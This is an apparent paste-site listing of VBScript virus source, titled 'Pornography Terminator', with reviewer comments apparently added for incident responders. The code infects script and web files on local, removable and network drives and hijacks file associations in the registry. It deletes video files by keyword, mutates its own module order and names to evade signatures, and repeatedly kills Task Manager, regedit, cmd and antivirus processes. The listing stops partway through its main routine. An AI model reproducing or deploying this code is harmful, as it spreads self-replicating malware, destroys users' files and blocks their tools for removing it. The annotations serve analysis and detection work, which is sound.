FlyFar

HJLMR - VBS Pornography Terminator Virus Source Code

Mar 6th, 2023 (edited)
VBScript 36.63 KB | Cybersecurity | 0 0
  1. 'Administrator4
  2. 'HJLMRRQRWYOZX2_25
  ' Thin wrapper: deletes the registry key or value named by strkey through
  ' WScript.Shell.RegDelete. It installs no error handler of its own, so a failed
  ' delete raises into whatever handler the caller has active.
  3. Sub DeleteReg(strkey)
  4.     Dim tmps
  5.     Set tmps = CreateObject("WScript.Shell")
  6.     tmps.RegDelete strkey
  7.     Set tmps = Nothing
  8. End Sub
  ' Thin wrapper: returns the registry value named by strkey via WScript.Shell.RegRead.
  ' No local error handling; callers in this listing (GetUserName, GetFSOName) rely on
  ' their own On Error Resume Next to survive a missing key.
  9. Function ReadReg(strkey)
  10.     Dim tmps
  11.     Set tmps = CreateObject("WScript.Shell")
  12.     ReadReg = tmps.RegRead(strkey)
  13.     Set tmps = Nothing
  14. End Function
  ' Thin wrapper: writes Value to the registry location strkey via WScript.Shell.RegWrite.
  ' When vtype is the empty string the type argument is omitted and RegWrite chooses
  ' the type; otherwise vtype (e.g. "REG_EXPAND_SZ" as used by the Set*FileAss subs) is passed.
  15. Sub WriteReg(strkey, Value, vtype)
  16.     Dim tmps
  17.     Set tmps = CreateObject("WScript.Shell")
  18.     If vtype = "" Then
  19.         tmps.RegWrite strkey, Value
  20.     Else
  21.         tmps.RegWrite strkey, Value, vtype
  22.     End If
  23.     Set tmps = Nothing
  24. End Sub
  25. 'WQKAULMNKKG2_25
  26. 'HJLMRRQRWYOZX2_21
  ' Returns True when fname contains any of nine hard-coded Chinese keywords, else False.
  ' The match is a plain substring test on the file name only; file content is never read.
  ' SearchFile uses the result to decide whether a video file (mpg/rmvb/avi/rm) is deleted,
  ' so this is the selector for the sample's destructive payload.
  27. Function IsSexFile(fname)
  28.     IsSexFile = False
  29.     If InStr(fname, "成人")>0 Or InStr(fname, "淫")>0 Or InStr(fname, "偷拍")>0 Or _
  30.                 InStr(fname, "偷窥")>0 Or InStr(fname, "口交")>0 Or InStr(fname, "强奸")>0 Or _
  31.                 InStr(fname, "轮奸")>0 Or InStr(fname, "伦理片")>0 Or InStr(fname, "自摸")>0 Then
  32.         IsSexFile = True
  33.     End If
  34. End Function
  ' Infection-marker test. buffer is a file's text, ftype its lower-case extension.
  ' For hta/htm/html/asp/vbs the file counts as infected only if it contains the global
  ' Head_V marker; every other type is reported as infected, so callers skip it.
  ' For triage, the presence of Head_V in a script or web file is the sample's own
  ' "already infected" indicator.
  35. Function Isinfected(buffer, ftype)
  36.     Isinfected = True
  37.     Select Case ftype
  38.         Case "hta", "htm" , "html" , "asp", "vbs"
  39.             If InStr(buffer, Head_V) = 0 Then
  40.                 Isinfected = False
  41.             End If
  42.         Case Else
  43.             Isinfected = True
  44.     End Select
  45. End Function
  46. 'WQKAULMNKKG2_21
  47. 'HJLMRRQRWYOZX2_22
  ' Returns the FileSystemObject special folder p with a trailing backslash.
  ' In the FSO API 0 is the Windows folder, 1 the System folder and 2 the Temp folder;
  ' this listing calls it with 0 and 1 to build the drop paths FullPath_V0 / FullPath_V1.
  48. Function GetSFolder(p)
  49.     Dim objfso
  50.     Set objfso = CreateObject(GetFSOName())
  51.     GetSFolder = objfso.GetSpecialFolder(p) & "\"
  52.     Set objfso = Nothing
  53. End Function
  ' Returns the Username value stored under the HKCU Active Setup component key below,
  ' or "Administrator" when that value is empty or unreadable (errors are suppressed).
  ' The result is not used for display: the top-level code derives the dropped file
  ' names (<name>.vbs, <name>.ini) and the Head_V / Tail_V markers from it, so those
  ' artefacts vary per user profile.
  54. Function GetUserName()
  55.     On Error Resume Next
  56.     Dim Value , UserName
  57.     Value = "HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}\Username"
  58.     UserName = ReadReg(Value)
  59.     If UserName = "" Then
  60.         GetUserName = "Administrator"
  61.     Else
  62.         GetUserName = UserName
  63.     End If
  64. End Function
  ' Looks up the ProgID registered for CLSID {0D43FE01-F093-11CF-8940-00A0C9054228} and
  ' returns it; callers pass the result to CreateObject to obtain their file-system object.
  ' NOTE(review): the fallback branch assigns to GetUserName, not to this function, so as
  ' written the return value appears to stay Empty when the registry read yields nothing.
  ' NOTE(review): resolving the ProgID at run time keeps the object name out of the
  ' CreateObject calls - presumably deliberate, not confirmed by anything on this page.
  65. Function GetFSOName()
  66.     On Error Resume Next
  67.     Dim Value , UserName
  68.     Value = "HKEY_CLASSES_ROOT\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\ProgID\"
  69.     UserName = ReadReg(Value)
  70.     If UserName = "" Then
  71.         GetUserName = "Scripting.FileSystemObject"
  72.     Else
  73.         GetFSOName = UserName
  74.     End If
  75. End Function
  ' Builds the two comment-line markers that bracket the injected code.
  '   l = 0 : head marker, an apostrophe followed by GetUserName().
  '   else  : tail marker, an apostrophe followed by that name reversed.
  ' The first line of this listing ('Administrator4) is the head marker for the fallback
  ' name with the Version digit appended. The loop index i is not declared locally.
  76. Function GetHeadTail(l)
  77.     Dim Str , buffer
  78.     If l = 0 Then
  79.         GetHeadTail = "'" & GetUserName()
  80.     Else
  81.         buffer = GetUserName()
  82.         Str = ""
  83.         For i = 1 To Len(buffer)
  84.             Str = Mid(buffer, i, 1) & Str
  85.             GetHeadTail = "'" & Str
  86.         Next
  87.     End If
  88. End Function
  89. 'WQKAULMNKKG2_22
  90. 'HJLMRRQRWYOZX1_9
  ' Returns vbsCode with its Num_DNA marker-delimited modules emitted in a random order.
  ' Steps: (1) draw a random permutation of 1..Num_DNA into DNA() by rejection sampling,
  ' (2) extract each module with GetModelCode, (3) concatenate them in permuted order and
  ' wrap the result in Head_V & Version ... Tail_V.
  ' For detection work: every generated copy has a different module order, so only
  ' content inside a single module, or the head/tail markers, is stable between copies.
  91. Function ChangeModelOrder(vbsCode, Num_DNA)
  92.     On Error Resume Next
  93.     Dim DNA(), Array_vbsCode()
  94.     Dim i, Value, flag, j, buffer
  95.     ReDim DNA(Num_DNA), Array_vbsCode(Num_DNA)
  96.     buffer = vbsCode
  97.     Randomize
  98.     For i = 1 To Num_DNA
  99.         Do
  100.             Value = Int((Num_DNA * Rnd) + 1)
  101.             flag = 1
  102.             For j = 1 To Num_DNA
  103.                 If Value = DNA(j) Then
  104.                     flag = 0
  105.                     Exit For
  106.                 End If
  107.             Next
  108.         Loop Until flag = 1
  109.         DNA(i) = Value
  110.     Next
  111.     For i = 1 To Num_DNA
  112.         Array_vbsCode(i) = GetModelCode(buffer, i)
  113.     Next
  114.     buffer = ""
  115.     For i = 1 To Num_DNA
  116.         buffer = buffer & VBCRLF & Array_vbsCode(DNA(i)) & VBCRLF
  117.     Next
  118.     ChangeModelOrder = Head_V & Version & VBCRLF & buffer & VBCRLF & Tail_V
  119. End Function
  120. 'WQKAULMNKKG1_9
  121. 'HJLMRRQRWYOZX2_26
  ' Launches the command line in ExeFullName through WScript.Shell.Run with default
  ' window style and without waiting. Callers in this listing pass a drive root, a
  ' viewer command (notepad/regedit/hh/winhlp32 plus arguments) or FullPath_V1.
  122. Sub Run(ExeFullName)
  123.     Dim WshShell
  124.     Set WshShell = WScript.CreateObject("WScript.Shell")
  125.     WshShell.Run ExeFullName
  126.     Set WshShell = Nothing
  127. End Sub
  ' Writes the text in code to the file pathf, creating or overwriting it
  ' (OpenTextFile mode 2 = ForWriting, create = true). Errors are suppressed and the
  ' stream is never closed explicitly. No caller of this sub is visible in this listing.
  128. Sub CopyFile(objfso, code, pathf)
  129.     On Error Resume Next
  130.     Dim vf
  131.     Set vf = objfso.OpenTextFile(pathf, 2, true)
  132.     vf.Write code
  133. End Sub
  ' Returns vbsCode with every occurrence of each string in Names replaced by a freshly
  ' generated string of the same length made of random upper-case letters A-Z.
  ' ExeVbs_Virus calls it with the two module-marker prefixes, so the marker names seen
  ' in this listing are specific to this copy. For signatures, the marker *shape*
  ' (apostrophe, upper-case run, "<digit>_<number>") is the stable part, not the letters.
  134. Function ChangeName(vbsCode, Names)
  135.     Dim Name, j, temp, buffer
  136.     buffer = vbsCode
  137.     Randomize
  138.     For Each Name in Names
  139.         temp = ""
  140.         For j = 1 To Len(Name)
  141.             temp = temp & Chr((Int(Rnd * 26) + 65))
  142.         Next
  143.         buffer = Replace(buffer, Name, temp)
  144.     Next
  145.     ChangeName = buffer
  146. End Function
  147. 'WQKAULMNKKG2_26
  148. 'HJLMRRQRWYOZX2_16
  ' Persistence via file-association hijack: rewrites the machine-wide "open" command
  ' for the txtfile class so that opening a .txt file starts WScript.exe with sFilePath
  ' and forwards the original arguments. Requires write access to HKLM; errors are
  ' suppressed. A command value here that references WScript.exe is the indicator;
  ' RestoreSystem in this listing shows the value the author treats as the default.
  149. Sub SetTxtFileAss(sFilePath)
  150.     On Error Resume Next
  151.     Dim Value
  152.     Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
  153.     Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  154. End Sub
  ' Same file-association hijack as the txtfile variant, applied to the hlpfile class:
  ' the machine-wide "open" command is replaced with WScript.exe "<sFilePath>" %1 %*.
  ' Errors are suppressed. A WScript.exe reference in this key is the indicator to check.
  155. Sub SethlpFileAss(sFilePath)
  156.     On Error Resume Next
  157.     Dim Value
  158.     Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
  159.     Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  160. End Sub
  ' Same file-association hijack, applied to the regfile class: opening a .reg file
  ' would start WScript.exe with sFilePath instead of the registry editor directly.
  ' Errors are suppressed. A WScript.exe reference in this key is the indicator to check.
  161. Sub SetRegFileAss(sFilePath)
  162.     On Error Resume Next
  163.     Dim Value
  164.     Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
  165.     Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  166. End Sub
  ' Same file-association hijack, applied to the chm.file class (compiled HTML help).
  ' Errors are suppressed. A WScript.exe reference in this key is the indicator to check.
  167. Sub SetchmFileAss(sFilePath)
  168.     On Error Resume Next
  169.     Dim Value
  170.     Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* "
  171.     Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\", Value, "REG_EXPAND_SZ")
  172. End Sub
  173. 'WQKAULMNKKG2_16
  174. 'HJLMRRQRWYOZX2_12
  ' Per-file worker called by SearchFile. strPath/fi identify the file, ftype is its
  ' lower-case extension, T selects the mode. Files of 350000 bytes or more are skipped.
  '   T = 0 (infect): if Isinfected() reports False, the file is rewritten with injected
  '       code placed BEFORE the original content. Web types get MakeScript(VbsCode_WebPage, 0)
  '       (MakeScript is defined outside this listing); .vbs files get vbsCode_Victim, after
  '       the first "Option Explicit" (case-insensitive) is stripped from the original.
  '       The global counter Cnt is incremented per rewritten file.
  '   T = 1 (clean): if the file carries the marker, the last Tail_V is located and
  '       Replace() is called with that position as its start argument, so the returned
  '       text begins at the tail marker and everything before it is dropped. strCode is
  '       never assigned on this path, so only a line break precedes the remaining text.
  ' The original content is kept intact after the injected block, which is why removal
  ' by cutting at the tail marker is possible. n is not declared locally; the write
  ' streams are never closed explicitly.
  175. Sub InfectHead(strPath, fi, objfso, VbsCode_WebPage, VbsCode_Victim, ftype, T)
  176.     On Error Resume Next
  177.     Dim tso, buffer, strCode , Maxsize
  178.     Maxsize = 350000
  179.     If fi.Size< Maxsize Then
  180.         Set tso = objfso.OpenTextFile(strPath, 1, True)
  181.         buffer = tso.ReadAll()
  182.         tso.Close
  183.         If T = 0 Then
  184.             Select Case ftype
  185.                 Case "hta", "htm", "html", "asp"
  186.                     If Isinfected(buffer, ftype) = False Then
  187.                         Set tso = objfso.OpenTextFile(strPath, 2, true)
  188.                         strCode = MakeScript(VbsCode_WebPage, 0)
  189.                         tso.Write strCode & VBCRLF & buffer
  190.                         Cnt = Cnt + 1
  191.                     End If
  192.                 Case "vbs"
  193.                     If Isinfected(buffer, ftype) = False Then
  194.                         n = InStr(buffer , "Option Explicit")
  195.                         If n<>0 Then
  196.                             buffer = Replace(buffer, "Option Explicit", "", 1, 1, 1)
  197.                             Set tso = objfso.OpenTextFile(strPath, 2, true)
  198.                             tso.Write vbsCode_Victim & VBCRLF & buffer
  199.                             Cnt = Cnt + 1
  200.                         Else
  201.                             Set tso = objfso.OpenTextFile(strPath, 2, true)
  202.                             tso.Write vbsCode_Victim & VBCRLF & buffer
  203.                             Cnt = Cnt + 1
  204.                         End If
  205.                     End If
  206.                 Case Else
  207.                     '
  208.                    '
  209.            End Select
  210.         ElseIf T = 1 Then
  211.             If Isinfected(buffer, ftype) = True Then
  212.                 n = InStrRev(buffer , Tail_V)
  213.                 If n<>0 Then
  214.                     buffer = Replace(buffer, Tail_V, "", n, 1, 1)
  215.                     Set tso = objfso.OpenTextFile(strPath, 2, True)
  216.                     tso.Write strCode & VBCRLF & buffer
  217.                 End If
  218.             End If
  219.         End If
  220.     End If
  221. End Sub
  222. 'WQKAULMNKKG2_12
  223. 'HJLMRRQRWYOZX2_17
  ' Single-instance check. Queries WMI (root\cimv2, Win32_Process) on the local machine
  ' for cscript.exe / wscript.exe processes whose command line contains this script's
  ' full path, and returns True when two or more are found (the current process plus at
  ' least one other). Errors are suppressed, so a failed query leaves the result False.
  224. Function PreInstance()
  225.     On Error Resume Next
  226.     Dim num_cnt
  227.     Dim strComputer, objWMIService, colProcessList, objProcess
  228.     num_cnt = 0
  229.     PreInstance = False
  230.     strComputer = "."
  231.     Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
  232.     Set colProcessList = objWMIService.ExecQuery("Select * from Win32_Process Where " & "Name = 'cscript.exe' or Name = 'wscript.exe'")
  233.     For Each objProcess in colProcessList
  234.         If InStr(CStr(objProcess.CommandLine), WScript.ScriptFullName)>0 Then
  235.             num_cnt = num_cnt + 1
  236.         End If
  237.     Next
  238.     If num_cnt>= 2 Then
  239.         PreInstance = True
  240.     End If
  241. End Function
  242. 'WQKAULMNKKG2_17
  243. 'HJLMRRQRWYOZX1_8
  ' The sample's own uninstall routine (reached from the "UnLoadMe" and kill orders in
  ' ExeVbs_Virus). It is useful to responders as an inventory of what the sample changes:
  '   - calls SafeSet() (defined outside this listing);
  '   - deletes HKCU\...\Windows NT\CurrentVersion\Windows\Load if it equals FullPath_V1;
  '   - rewrites the "open" commands for txtfile, regfile, chm.file, hlpfile and exefile
  '     to the values the author treats as defaults, when they differ;
  '   - on every drive whose root holds Name_V1, deletes that file and AutoRun.inf;
  '   - deletes FullPath_V1, FullPath_V0 and FullPath_Config if present.
  ' NOTE(review): the "default" command strings are the author's assumptions for the
  ' Windows versions targeted; verify against a clean reference system before reusing them.
  ' Errors are suppressed throughout; vf is not declared locally.
  244. Sub RestoreSystem(objfso)
  245.     On Error Resume Next
  246.     Dim Value, dc, d, HCULoad
  247.     Call SafeSet()
  248.     HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
  249.     If ReadReg(HCULoad) = FullPath_V1 Then
  250.         Call DeleteReg(HCULoad)
  251.     End If
  252.     Value = "%SystemRoot%\system32\NOTEPAD.EXE %1"
  253.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>Value Then
  254.         Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  255.     End If
  256.     Value = "regedit.exe " & """%1"""
  257.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>Value Then
  258.         Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  259.     End If
  260.     Value = GetSFolder(1) & "hh.exe " & """%1"""
  261.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>Value Then
  262.         Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\", Value, "REG_EXPAND_SZ")
  263.     End If
  264.     Value = "%SystemRoot%\system32\winhlp32.exe %1"
  265.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>Value Then
  266.         Call WriteReg ("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\", Value, "REG_EXPAND_SZ")
  267.     End If
  268.     Value = """%1"" %*"
  269.     If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\")<>Value Then
  270.         Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\", Value, "REG_SZ")
  271.     End If
  272.     Set dc = objfso.Drives
  273.     For Each d In dc
  274.         If objfso.FileExists(d.DriveLetter & ":\" & Name_V1) = True Then
  275.             objfso.DeleteFile d.DriveLetter & ":\" & Name_V1
  276.             objfso.DeleteFile d.DriveLetter & ":\" & "AutoRun.inf"
  277.         End If
  278.     Next
  279.     If objfso.FileExists(FullPath_V1) = True Then
  280.         Set vf = objfso.GetFile(FullPath_V1)
  281.         vf.Delete
  282.     End If
  283.     If objfso.FileExists(FullPath_V0) = true Then
  284.         Set vf = objfso.GetFile(FullPath_V0)
  285.         vf.Delete
  286.     End If
  287.     If objfso.FileExists(FullPath_Config) = True Then
  288.         objfso.DeleteFile FullPath_Config , True
  289.     End If
  290. End Sub
  291. 'WQKAULMNKKG1_8
  292. 'HJLMRRQRWYOZX1_5
  ' Resident loop: every 5 seconds, without end, it calls KillProcess with the process
  ' list below and then InvadeSystem(objfso, vbsCode). Both helpers are defined outside
  ' this listing; from the names, presumably they terminate the listed processes and
  ' re-apply the persistence changes - confirm against the full sample.
  ' The list covers Task Manager, the command prompt, Registry Editor (several
  ' extensions), msconfig and third-party tools, i.e. the utilities a user would reach
  ' for to inspect or remove the infection. Those tools closing within seconds of launch
  ' while a wscript.exe process stays resident is a symptom consistent with this loop.
  293. Sub MonitorSystem(objfso, vbsCode)
  294.     On Error Resume Next
  295.     Dim ProcessNames
  296.     ProcessNames = Array("ras.exe", "360tray.exe", "taskmgr.exe", "cmd.exe", "cmd.com", "regedit.exe", "regedit.scr", "regedit.pif", "regedit.com", "msconfig.exe", "SREng.exe", "USBAntiVir.exe")
  297.     Do
  298.         Call KillProcess(ProcessNames)
  299.         Call InvadeSystem(objfso, vbsCode)
  300.         WScript.Sleep 5000
  301.     Loop
  302. End Sub
  303. 'WQKAULMNKKG1_5
  304. 'HJLMRRQRWYOZX1_4
  ' Returns, as one string, the source text of the module-1_1 preamble: the opening
  ' module marker, the global declarations and the assignments that also appear as
  ' top-level code near the end of this listing. VictimHead / VirusHead / WebHead append
  ' an entry-point stub and the closing marker to it.
  ' The FullPath_V0 line is emitted twice (listing lines 314 and 315). The Chinese text
  ' inside the literals is part of the generated source and is left as posted.
  305. Function Head()
  306.     Head = VBCRLF & "'HJLMRRQRWYOZX1_1" & VBCRLF &_
  307.     "On Error Resume Next" & VBCRLF &_
  308.     "Dim Cnt, CntMax, Version, Name_V1, FullPath_V0, FullPath_V1, FullPath_Config,Sum_ModelCode,Head_V,Tail_V" & VBCRLF &_
  309.     "Dim ModelHead, ModelTail" & VBCRLF &_
  310.     "Cnt = 0" & VBCRLF &_
  311.     "CntMax = 1000" & VBCRLF &_
  312.     "Version = ""4""" & VBCRLF &_
  313.     "Name_V1 = GetUserName() & "".vbs""" & VBCRLF &_
  314.     "FullPath_V0 = GetSFolder(0) & Name_V1 '主要执行文件关联转向" & VBCRLF &_
  315.     "FullPath_V0 = GetSFolder(0) & Name_V1 '主要执行文件关联转向" & VBCRLF &_
  316.     "FullPath_V1 = GetSFolder(1) & Name_V1 '主要执行配置文件命令" & VBCRLF &_
  317.     "FullPath_Config= GetSFolder(1) & GetUserName() & "".ini""" & VBCRLF &_
  318.     "Sum_ModelCode = 26" & VBCRLF &_
  319.     "Head_V= GetHeadTail(0)" & VBCRLF &_
  320.     "Tail_V= GetHeadTail(1)" & VBCRLF &_
  321.     "ModelHead=""'HJLMRRQRWYOZX""" & VBCRLF &_
  322.     "ModelTail=""'WQKAULMNKKG""" & VBCRLF
  323. End Function
  ' Returns the module-1_1 text for the variant prepended to .vbs files: the shared
  ' preamble from Head(), an entry stub that calls ExeVbs_Victim, and the closing marker.
  324. Function VictimHead()
  325.     VictimHead = Head() & VBCRLF &_
  326.     "Call VictimMain()" & VBCRLF &_
  327.     "Sub VictimMain()" & VBCRLF &_
  328.     "   Call ExeVbs_Victim()" & VBCRLF &_
  329.     "End Sub" & VBCRLF &_
  330.     "'WQKAULMNKKG1_1" & VBCRLF
  331. End Function
  ' Returns the module-1_1 text for the standalone variant: the shared preamble from
  ' Head(), an entry stub that calls the ExeVbs_ routine for that variant, and the
  ' closing marker. The <span class="searchlite"> tags are search-highlight markup left
  ' by the hosting page, not part of the script.
  332. Function <span class="searchlite">Virus</span>Head()
  333.     <span class="searchlite">Virus</span>Head = Head() & VBCRLF &_
  334.     "Call <span class="searchlite">Virus</span>Main()" & VBCRLF &_
  335.     "Sub <span class="searchlite">Virus</span>Main()" & VBCRLF &_
  336.     "   On Error Resume Next" & VBCRLF &_
  337.     "   Call ExeVbs_<span class="searchlite">Virus</span>()" & VBCRLF &_
  338.     "End Sub" & VBCRLF & VBCRLF &_
  339.     "'WQKAULMNKKG1_1" & VBCRLF
  340. End Function
  ' Returns the module-1_1 text for the variant injected into hta/htm/html/asp files:
  ' the shared preamble from Head(), an entry stub that calls ExeVbs_WebPage, and the
  ' closing marker.
  341. Function WebHead()
  342.     WebHead = Head() & VBCRLF &_
  343.     "Call WebMain()" & VBCRLF &_
  344.     "Sub WebMain()" & VBCRLF &_
  345.     "   On Error Resume Next" & VBCRLF &_
  346.     "   Call ExeVbs_WebPage()" & VBCRLF &_
  347.     "End Sub" & VBCRLF &_
  348.     "'WQKAULMNKKG1_1" & VBCRLF
  349. End Function
  350. 'WQKAULMNKKG1_4
  351. 'HJLMRRQRWYOZX2_20
  ' Extracts one module from vbsCode. A module is the text from the comment line
  ' ModelHead & "<d>_<N>" through the matching ModelTail & "<d>_<N>" inclusive, where
  ' <N> is N_ModelCode and <d> is its digit count (1, 2 or 3). These are the marker
  ' comment lines that sit between the procedures of this listing.
  ' For N_ModelCode outside 1..999 nothing is assigned and the result is Empty. Errors
  ' (e.g. a marker that is not found) are suppressed.
  352. Function GetModelCode(vbsCode, N_ModelCode)
  353.     On Error Resume Next
  354.     Dim n, n1, buffer
  355.     buffer = vbsCode
  356.     If N_ModelCode>= 1 And N_ModelCode<= 9 Then
  357.         n = InStr(buffer, ModelHead & "1_" & N_ModelCode)
  358.         n1 = InStr(buffer, ModelTail & "1_" & N_ModelCode)
  359.         GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "1_" & N_ModelCode))
  360.     ElseIf N_ModelCode>= 10 And N_ModelCode<= 99 Then
  361.         n = InStr(buffer, ModelHead & "2_" & N_ModelCode)
  362.         n1 = InStr(buffer, ModelTail & "2_" & N_ModelCode)
  363.         GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "2_" & N_ModelCode))
  364.     ElseIf N_ModelCode>= 100 And N_ModelCode<= 999 Then
  365.         n = InStr(buffer, ModelHead & "3_" & N_ModelCode)
  366.         n1 = InStr(buffer, ModelTail & "3_" & N_ModelCode)
  367.         GetModelCode = Mid(buffer, n, n1 - n + Len(ModelTail & "3_" & N_ModelCode))
  368.     End If
  369. End Function
  370. 'WQKAULMNKKG2_20
  371. 'HJLMRRQRWYOZX1_2
  372. Sub ExeVbs_WebPage()
  373.     On Error Resume Next
  374.     Dim objfso, vbsCode, VbsCode_Virus
  375.     Set objfso = CreateObject(GetFSOName())
  376.     vbsCode = GetScriptCode("vbscript")
  377.     VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  378.     VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  379.     Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  380.     Set objfso = Nothing
  381. End Sub
  ' Entry point of the copy prepended to an infected .vbs file (called from the
  ' VictimMain stub). It reads its own source from the running script file, rebuilds the
  ' standalone variant, shuffles the module order, hands the result to InvadeSystem
  ' (defined outside this listing) and then launches FullPath_V1.
  ' The <span class="searchlite"> tags are search-highlight markup left by the hosting
  ' page, not part of the script.
  382. Sub ExeVbs_Victim()
  383.     On Error Resume Next
  384.     Dim objfso, vbsCode, VbsCode_Virus
  385.     Set objfso = CreateObject(GetFSOName())
  386.     vbsCode = GetSelfCode(objfso, WScript.ScriptFullName)
  387.     VbsCode_<span class="searchlite">Virus</span> = Head_V & Version & VBCRLF & <span class="searchlite">Virus</span>Head() & GetMainBody(vbsCode, Sum_ModelCode) & VBCRLF & Tail_V
  388.     VbsCode_<span class="searchlite">Virus</span> = ChangeModelOrder(VbsCode_<span class="searchlite">Virus</span>, Sum_ModelCode)
  389.     Call InvadeSystem(objfso, VbsCode_<span class="searchlite">Virus</span>)
  390.     Call Run(FullPath_V1)
  391.     Set objfso = Nothing
  392. End Sub
  393. 'WQKAULMNKKG1_2
  394. 'HJLMRRQRWYOZX2_11
  ' Recursive directory walk starting at strPath. For each file, by lower-case extension:
  '   hta/htm/html/asp/vbs -> InfectHead(...) in mode T (0 = infect, 1 = clean);
  '   mpg/rmvb/avi/rm      -> deleted outright when IsSexFile(name) is True.
  ' The walk then recurses into every subfolder. Both loops stop once the global Cnt
  ' reaches CntMax, which caps the number of files rewritten per run. The deletion branch
  ' ignores T, so files are deleted during a "clean" pass too. Errors (access denied,
  ' locked files) are suppressed.
  395. Sub SearchFile(objfso, strPath, VbsCode_WebPage, VbsCode_Victim, T)
  396.     On Error Resume Next
  397.     Dim pfo, pf, pfi, ext
  398.     Dim psfo, ps
  399.     Set pfo = objfso.GetFolder(strPath)
  400.     Set pf = pfo.Files
  401.     For Each pfi In pf
  402.         If Cnt >= CntMax Then
  403.             Exit For
  404.         End If
  405.         ext = LCase(objfso.GetExtensionName(pfi.Path))
  406.         Select Case ext
  407.             Case "hta", "htm", "html", "asp", "vbs"
  408.                 Call InfectHead(pfi.Path, pfi, objfso, VbsCode_WebPage, VbsCode_Victim, ext, T)
  409.             Case "mpg", "rmvb", "avi", "rm"
  410.                 If IsSexFile(pfi.Name) = True Then
  411.                     pfi.Delete
  412.                 End If
  413.         End Select
  414.     Next
  415.     Set psfo = pfo.SubFolders
  416.     For Each ps In psfo
  417.         If Cnt >= CntMax Then
  418.             Exit For
  419.         End If
  420.         Call SearchFile(objfso, ps.Path, VbsCode_WebPage, VbsCode_Victim, T)
  421.     Next
  422. End Sub
  423. 'WQKAULMNKKG2_11
  424. 'HJLMRRQRWYOZX2_10
  ' Runs SearchFile from the root of every drive whose FSO DriveType is 1, 2 or 3
  ' (removable, fixed, network), stopping once the global Cnt reaches CntMax.
  ' Because network drives are included, mapped shares are walked like local disks;
  ' scope an investigation to shares that were mapped on the affected host as well.
  ' The commented-out lines show an earlier removable-only condition.
  425. Sub SearchDrives(objfso, VbsCode_WebPage, VbsCode_Victim, T)
  426.     On Error Resume Next
  427.     Dim d , dc
  428.     Set dc = objfso.Drives
  429.     For Each d In dc
  430.         If Cnt >= CntMax Then '
  431.            Exit For
  432.         End If
  433.         If d.DriveType = 1 Or d.DriveType = 2 Or d.DriveType = 3 Then
  434.             'If d.DriveType = 1 Then
  435.            Call SearchFile(objfso, d.Path & "\", VbsCode_WebPage, VbsCode_Victim, T)
  436.             'End If
  437.        End If
  438.     Next
  439. End Sub
  440. 'WQKAULMNKKG2_10
  441. 'HJLMRRQRWYOZX1_3
  ' Main dispatcher of the standalone copy. It joins all command-line arguments into
  ' Para_V and branches on the last three characters (lower-cased):
  '   "run"                -> opens the root of the drive the script was started from;
  '   "txt"/"log", "reg",
  '   "chm", "hlp"         -> starts the normal viewer (notepad, regedit, hh, winhlp32) on
  '                           the argument, so a hijacked file association still opens
  '                           the file the user clicked.
  ' Each of those branches then rebuilds the script text (GetSelfCode -> GetMainBody ->
  ' ChangeModelOrder -> ChangeName), passes it to InvadeSystem and launches FullPath_V1.
  ' Any other invocation is the resident path: quit if PreInstance reports another copy,
  ' then, when IsOK(...) is False, read an "<order>@<parameter>" line from FullPath_Config
  ' and act on the order (InfectFiles, Msg, UnLoadMe, the kill order, or a default that
  ' starts a new infection pass); otherwise go straight to MonitorSystem.
  ' InvadeSystem, IsOK, ReadOK and WriteOK are defined outside this listing.
  ' For responders: the .ini file at FullPath_Config is the sample's state/command file
  ' and the orders handled here show what its content means.
  ' The <span class="searchlite"> tags are search-highlight markup left by the hosting
  ' page, not part of the script.
  442. Sub ExeVbs_<span class="searchlite">Virus</span>()
  443.     On Error Resume Next
  444.     Dim objfso, objshell, FullPath_Self, Name_Self, Names
  445.     Dim oArgs, ArgNum, Para_V, SubPara_V, RunPath
  446.     Dim Order, Order_Order, Order_Para
  447.     Dim vbsCode , VbsCode_<span class="searchlite">Virus</span>, VbsCode_WebPage, VbsCode_Victim , MainBody
  448.     Set objfso = CreateObject(GetFSOName())
